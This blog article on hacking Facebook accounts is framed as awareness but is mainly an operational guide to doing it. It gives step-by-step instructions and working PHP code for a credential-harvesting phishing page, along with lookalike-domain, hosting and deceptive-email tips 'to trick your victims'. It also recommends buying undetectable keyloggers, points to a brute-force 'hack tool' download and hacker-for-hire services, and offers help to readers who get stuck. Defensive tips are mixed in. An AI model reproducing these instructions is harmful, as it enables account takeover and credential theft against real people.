How many times have you seen an update on your timeline from one of your Facebook friends stating their account had been hacked? If the same has happened to you or are wondering how that happened, in this article we’ll explore three potential methods that hackers could have used to access their passwords.
The purpose here is not to equip you with the tools to go hack your friends and strangers, but rather to expose hacking tactics that will ensure you don’t fall prey to hackers.
The Methods (Article Navigation):
1. Phishing
– How to make a Phishing page for Facebook
2. Keylogging
3. Bruteforce
4. Hire a Hacker
Extra tip: How to Protect Yourself from Hacking?
Phishing
The first means of hacking a Facebook account is phishing. Just as the name sounds, it is a fishing expedition where the hacker puts out bait and you end up biting it. In this case, what catches you is a fake website. Therefore, phishing is when a hacker gets you to put sensitive information such as your password and pins into a fake website, and instantly gaining access to your personal data and accounts.
This approach often happens on email, but people on social media fall prey as well. What does it look like? It usually disguised in anything that is too good to be true. Do you suddenly have an unknown brand offering you free tangible or digital gifts and prices for absolutely no reason? That is an indication that there is a hacker trying to phish you. That’s usually the fastest way to tell if you’re dealing with a hacker; when they are offering you something you didn’t solicit.
Another indication that you’re dealing with a scammer is that they ask you to click on a link and redirect you to what looks like the Facebook login page, asking for your email address and password. Therefore, be mindful of the links that you engage in. Before clicking on a promotion or offer, ensure that “www.facebook.com” is at the beginning of the URL link.
Hackers often send you an email with instructions. What else do these messages look like?
– You’ll find that generally, the text is all over the place. There will be typos, randomly placed accents and multiple fonts and colors. It’ll be reminiscent of a toddler first getting acquainted with MS Word.
– The links are mismatched, meaning that what it says on the body of text is not the same one that appears on a new tab once you’ve clicked on it.
– Indicate that your password is in attachment, or ask you for your password, or personal information such as your credit card number or the PIN, social security number or tax ID, something Facebook never does.
– A startling warning that your account might be locked or deleted if you don’t do something immediately, usually login in on the link provided.
If any of the above happens to you, do not ignore. Instead, forward the email to phish@fb.com. Alternatively, you can report links that you notice on the platform itself. What problematic however is that Facebook don’t promise to take care of every issue reported. It is therefore up to you to remain vigilant and warn others.
How to make a phishing page for Facebook
Before we get into the tutorial, one thing ought to be clear. This guide is for educational purposes only. The intention is to help you understand the mind of a hacker and not to maliciously use this information on others.
Step 1
Open your browser and go to the Facebook website login page. (You should be logged out of your profile). On the webpage, right click and select the option “view page source” (Ctrl + U). The page will open on a new tab.
Step 2
Once it is open, right click again and select the option “Save As”. Change the page title to “index.html” and save it on your computer.
Step 3
Open the same file using notepad. Press Ctrl + F to open the Find function. Once it opens type in “action” and then click on “Find Next” There are two “actions” in a document, you need first one.
Step 4
Swap the link URL after the “action=” with “phish.php” (So there should be no link left, but “phish.php” inside the brackets should be there. The purpose of that is so that when a user is login in, it directs them to “phish.php” instead of to real Facebook address.
Step 5
The next course of action is to create the actual phish.php page. What you’re required to do is open Notepad and paste the script below.
<?php
header ('Location: https://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save the document “phish.php”. What will end up happening is that the above script will log the user credentials, saving it under a filename called “pass.txt”.
Step 6
With the files you made ready you can now upload them to a free web hosting site, like www.000webhost.com, or some paid “real” hosting provider (even better) because free ones can ban your account if their system detects you’re using them for phishing, which is illegal. Whichever you select, when creating your username, make sure it’s quite similar to what you have on Facebook.
With free webhosting, such as 000webhost.com you already get a free domain, which looks like “your-selected-name.000webhost.com”, make sure this username you choose something similar to Facebook’s one, to trick your victims more easier.
However if you decided to go with paid hosting, you’ll also need to register some real domain. That will cost you additionally around $10. When choosing a domain, make sure it looks similar to Facebook, lie for examply something like “facebooksecuredloginpage.com” or whatever you want.
Step 7
After you have hosting ready, upload your “index.html” and “phish.php” files to File Manager inside your hosting’s provider cPanel account.
Inside File Manager, look for the “htdocs” folder (Sometimes it’s called “public_html”). This is a place where your two files needs to be uploaded.
If you see there “index.html” or “index2.html” already, delete those files or replace it with your “index.html” one you previously made.
Step 8
You should then type in the URL to check if the phishing page is working. Depending on the free hosting website you used, the URL should appear as www.your-custom-facebook-phisher-name.[hostname].com. Or if you registered your own read .com, .net, .org or some else domain, this is the phishing site you’re going to send to your “victims”.
Step 9
Craft an email address(es) that you’ll use to share a link with your target. Ensure that it closely resembles what Facebook would typically send out to the users. That way, they don’t think that something is off. Ensure that you disguise the link by using an obfuscated URL. Once they click on it they’ll be directed to the fake site.
Conclusion
When the unsuspecting person does indeed us the link to enter their email address and password, the same will be saved under the “pass.txt” file, which is located in same folder as the files you uploaded to your hosting. From there, you can use these credentials to hack their actual Facebook address.
Keylogging
Next on our list is a tool that hackers also use to steal your personal information. Keylogging is hacking method whereby the tool, a keylogger, keeps a log of the keystrokes in your computer. When installed in your computer, when you start up your computer, you will go about business as usually typing in your password without knowing that they are being logged.
Hackers install this in your computer and use it on you, the unsuspecting user. As you type on the keyboard, a hacker is able to intercept passwords and other personal information that they can then use to access your accounts and even steal from you. What makes it dangerous is that they are able to access PINs and passwords to all your accounts as you unknowingly log into apps, emails, shopping sites and any place on the web where you have to key in valuable information.
It is said that this tool is used for espionage purposes but it is a tool that can be used against ordinary citizens. All it takes is a few tactics that include where the hacker puts a hardware bug or tamper with the wiring on your keyboard, using a filter drive, or masking themselves in user mode or kernel mode. Just as with the former hacking method, all it requires is for a user to click on a link or opening an attachment or file sent from a phishing email.
Another method used when keylogging is by sending you to a website accessible through a browser that doesn’t offer internet defense. It is for this reason that you’re recommended not to click on websites that initially have a warning that the website is not secure. Choosing to proceed is potentially walking into a hacker’s ground.
Lastly, keylogging can happen when you get your laptop fixed after software or a hardware issue from a professional that’s not trusted. It is for that reason that you need to ensure that, when your laptop has a problem, you take it back to the distributor or get a certified professional. You don’t want to be a target for a hacker because you want to get services for cheap.
How is the keylogger installed?
As mentioned, the first point of access that an unsuspecting user has with a keylogger is through a phishing email or message on any of your social media platforms. In these email you’ll be prompted to engage with links or downloads. These often tend to be random where hackers spam multiple accounts with the hope of someone falling in their trap. Alternatively, if a hacker knows you or has taken time to note your interests, they are likely to tailor the email to your linking, increasing the chances of you falling victim. Within the link, the hacker will typically use a Trojan virus to get you to install a keylogger.
Where to Find and Download a Keylogger?
There are many keylogger products apps on the internet. It all depends on your budget. Generally, more you pay for it, more quality it will provide. And most important of all, it will be more undetected, if not FUD (Fully undetected) from antivirus software.
There are also free keyloggers out there available on various hacking forums sections. But watch yourself of those as they can often be binded together with other malware or trojans which can infect your PC or phone and you can become a victim of keylogging instead.
So our recommendation would be rather to purchase one instead of downloading a freebie. Because you never know what exactly you’ll get.
How to protect yourself
Avoid having any form of engagement with emails addressed that don’t match the company they state they are coming form. An example is if you get an email from Facebook, and the latter part of the email address says @facebook.phb.com instead of @facebook.com, or something entirely different, you’re better off reporting it as spam or deleting it.
Other ways to protect yourself is having a well-rated antivirus, using a virtual keyboard for your passwords or a multi-factor authentication process. Most of all, you want to be more conscious of the processes that you undertake online. Avoid clicking on anything without paying attention to what it is. Being hacked can happen to the best of us, and it therefore pays off to be vigilant.
Brute force cracking (the “Facebook Hack Tool”)
Last on the list is less technically. It is essentially using a trial and error method to hack into someone’s account. This method doesn’t require coding like those mentioned above. Instead, a person can use an app that to decodes encrypted data. This software, plainly put, tries all possible combinations until it finds the one. How long it takes to crack a password depends on how complicated one’s password is.
Where to Download this Tool?
Facebook Hacker application which is renamed after its latest update to FB Shredder, can be found to download on its official website,
www.FBShredder.com
The FB Shredder app is supported for desktop and smartphones, with full list of todays most used operating systems:
– Android (Apk), iOS (iPhone / iPad), Microsoft Windows and macOS.
If that site doesn’t work, the tool is also available to download from their another Mirror 2 website: check out the Crazy Greek’s post where they share download link of this app.
Hackers are not the only people you’ll find using this hacking tool. When a entity wants to test their network security they will have a programmer or the point person for cyber security use it to gauge how protected they are. Given how effective the tool is, and also its near foolproof capabilities, hackers use it not all your passwords, Facebook included. Do you know what else hackers love it? It is the most straightforward method to hack this social media platform successfully.
Hire a Hacker
If none of the methods above worked successfully for you to hack into a Facebook account, you always have an option to do do a job to a professional.
We have a hacking services sponsored page at our blog where you can find if some hackers are available to offer their services. Usually they take a fee per one account so unfortunately these services will not be free.
We suggest you to learn hacking by yourself first and try all the methods listed above. If you still can’t hack an account by yourself, then you should consider hire a real hacker for your need.
How to protect yourself from Hacking?
Facebook and other accounts provide a two-factor authentication system that sends you an email or SMS notification when you try to access accounts through new or unrecognized devices or locations. If you haven’t activated this feature then we highly suggest you do. It stops brute force in its tracks- the hacker will need to enter the code to continue hacking. Once this happens, change your password immediately and put a stronger one. Also, install a firewall to issue warnings whenever information you key in is being sent to third-party sites. Unless you trust the site, choose not to proceed.
The other way to keep hackers out of your Facebook account is to choose a strong password. If, when creating a password, it indicates that it’s weak, don’t proceed to open the account. Instead, create a stronger password. Avoid the usual; names, birthdays, addresses and the like. Instead, choose something random (but means something to you so that you don’t forget) that includes letters and symbols.
Most of all use a variety of passwords instead of a ‘master password’ for all your accounts. You want to avoid a scenario where, once a hacker has one password, they are able to access all your accounts. Equally, maintain the habit of logging out of all apps. You don’t want to go into a panic when your devices fall into the wrong hands.
Wrap up
The internet contains the good and the bad, with hackers wreaking havoc and causing harm and loss to those who unknowingly fall for their tricks. You therefore want to always be mindful of the pages, sites, links and programs you click on. It’s better to protect yourself than try to reverse the damage.
If you stuck with some problem with trying some of these methods, tell us and post in a commend below. We’ll be glad to help you solve it out. 🙂